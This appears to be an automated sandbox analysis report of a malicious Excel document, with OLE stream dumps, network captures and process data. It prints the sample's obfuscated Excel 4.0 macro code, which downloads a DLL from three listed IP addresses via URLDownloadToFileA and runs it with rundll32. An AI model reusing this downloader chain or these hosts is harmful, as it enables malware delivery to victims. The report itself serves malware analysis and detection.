Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
General
Stream Path:UserForm1/o
File Type:empty
Stream Size:0
Entropy:0.0
Base64 Encoded:False
Data ASCII:
Data Raw:
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:4263
Entropy:4.38205341073
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 1024
General
Stream Path:VBA/dir
File Type:data
Stream Size:1024
Entropy:6.73319737871
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
05/04/21-18:25:00.729496TCP1201ATTACK-RESPONSES 403 Forbidden804916591.211.91.81192.168.2.22
05/04/21-18:25:01.482346TCP1201ATTACK-RESPONSES 403 Forbidden80491665.34.179.36192.168.2.22
05/04/21-18:25:01.692668TCP1201ATTACK-RESPONSES 403 Forbidden804916745.153.229.23192.168.2.22

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
May 4, 2021 18:25:00.495213032 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:25:00.580924988 CEST804916591.211.91.81192.168.2.22
May 4, 2021 18:25:00.581046104 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:25:00.582185030 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:25:00.665724039 CEST804916591.211.91.81192.168.2.22
May 4, 2021 18:25:00.729496002 CEST804916591.211.91.81192.168.2.22
May 4, 2021 18:25:00.729610920 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:25:00.762547970 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:25:00.907682896 CEST80491665.34.179.36192.168.2.22
May 4, 2021 18:25:00.907790899 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:25:00.908478022 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:25:01.053366899 CEST80491665.34.179.36192.168.2.22
May 4, 2021 18:25:01.482346058 CEST80491665.34.179.36192.168.2.22
May 4, 2021 18:25:01.482428074 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:25:01.495521069 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:25:01.563970089 CEST804916745.153.229.23192.168.2.22
May 4, 2021 18:25:01.564171076 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:25:01.565252066 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:25:01.631198883 CEST804916745.153.229.23192.168.2.22
May 4, 2021 18:25:01.692667961 CEST804916745.153.229.23192.168.2.22
May 4, 2021 18:25:01.692867041 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:26:05.730789900 CEST804916591.211.91.81192.168.2.22
May 4, 2021 18:26:05.730952024 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:26:06.481005907 CEST80491665.34.179.36192.168.2.22
May 4, 2021 18:26:06.481180906 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:26:06.690161943 CEST804916745.153.229.23192.168.2.22
May 4, 2021 18:26:06.690356016 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:27:00.392105103 CEST4916780192.168.2.2245.153.229.23
May 4, 2021 18:27:00.392354012 CEST4916680192.168.2.225.34.179.36
May 4, 2021 18:27:00.392688036 CEST4916580192.168.2.2291.211.91.81
May 4, 2021 18:27:00.457731009 CEST804916745.153.229.23192.168.2.22
May 4, 2021 18:27:00.477420092 CEST804916591.211.91.81192.168.2.22
May 4, 2021 18:27:00.537447929 CEST80491665.34.179.36192.168.2.22

HTTP Request Dependency Graph

  • 91.211.91.81
  • 5.34.179.36
  • 45.153.229.23

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.224916591.211.91.8180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 18:25:00.582185030 CEST0OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.211.91.81
Connection: Keep-Alive
May 4, 2021 18:25:00.729496002 CEST1INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:00 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.22491665.34.179.3680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 18:25:00.908478022 CEST1OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.34.179.36
Connection: Keep-Alive
May 4, 2021 18:25:01.482346058 CEST2INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session IDSource IPSource PortDestination IPDestination PortProcess
2192.168.2.224916745.153.229.2380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
May 4, 2021 18:25:01.565252066 CEST3OUTGET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.153.229.23
Connection: Keep-Alive
May 4, 2021 18:25:01.692667961 CEST4INHTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Start time:18:24:39
Start date:04/05/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f820000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Reset < >